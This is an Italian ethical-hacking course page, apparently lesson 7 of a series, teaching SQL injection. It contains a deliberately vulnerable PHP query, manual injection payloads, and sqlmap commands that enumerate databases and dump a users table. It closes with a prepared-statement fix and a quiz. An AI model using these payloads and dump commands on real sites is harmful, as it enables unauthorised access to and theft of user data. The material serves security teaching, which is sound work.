💻 Software hacking Medio ⏱ 90 min 👁 5 visualizzazioni

Corso Hacking Etico #7: SQL Injection Completa

Davide Russo @CyberSec_Italia · 1 giorni fa · aggiornato 2 ore fa
📥
Piano di Studio Completo — Scarica il PDF
Percorso strutturato con settimane, risorse e checklist. Gratis, nessuna registrazione richiesta.
⬇ Scarica PDF

SQL Injection: La Vulnerabilita Piu Diffusa

Nella OWASP Top 10 da vent'anni. Ancora ovunque nel 2026.

Il Problema

// VULNERABILE
$query = "SELECT * FROM users WHERE id = " . $_GET['id'];
// id = 1 OR 1=1-- -> ritorna tutto il database!

Detection Manuale

https://sito.com/page?id=1'
https://sito.com/page?id=1 AND 1=1
https://sito.com/page?id=1 AND 1=2
https://sito.com/page?id=1; SLEEP(5)--

SQLmap

sqlmap -u "http://sito.com/page?id=1"
sqlmap -u "http://sito.com/page?id=1" --dbs
sqlmap -u "http://sito.com/page?id=1" -D db -T users --dump
sqlmap -u "http://sito.com/login" --data="user=a&pass=b"

Difesa: Prepared Statements

// SICURO
$stmt = $pdo->prepare("SELECT * FROM users WHERE id = ?");
$stmt->execute([$id]);

Conclusione

Nel Modulo 8: XSS e CSRF.

🧠 Metti alla prova le tue conoscenze

3 domande · Soglia superamento: 70%

1. Quale simbolo aggiunto a un parametro URL è il primo test per SQLi?

2. Cosa sono i prepared statements?

3. Quale strumento automatizza il rilevamento e lo sfruttamento di SQL Injection?

Accedi per completare il quiz.

💬 Commenti (0)

Nessun commento ancora. Sii il primo!

Accedi per commentare.